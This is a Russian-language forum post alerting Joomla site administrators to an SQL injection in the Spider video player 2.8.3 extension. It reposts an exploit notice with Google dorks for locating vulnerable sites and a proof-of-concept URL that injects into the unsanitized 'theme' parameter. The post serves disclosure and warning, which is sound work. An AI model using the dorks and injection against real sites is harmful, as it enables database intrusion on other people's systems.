×
Ruby on Rails: постинг твитов через Twitter API (04 нояб 2017)

Практикуемся в Ruby on Rails.

Важно Joomla Spider 2.8.3 SQL Injection

Больше
3 года 3 мес. назад #1 от serge
serge создал эту тему: Joomla Spider 2.8.3 SQL Injection
Вниманию web-админов, использующих популярный Joomla Spider! версия 2.8.3 содержит уязвимость, уровень которой хотя и обозначен как medium, но все равно ничего хорошего. Описание эксплойта:

######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
# Dork Google: inurl:/component/spidervideoplayer
inurl:option=com_spidervideoplayer

# Date : 2014-08-26

# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox

######################

# PoC Exploit:

http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'

"theme" variable is not sanitized.
#####################

Discovered By : Claudio Viviani

#####################

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.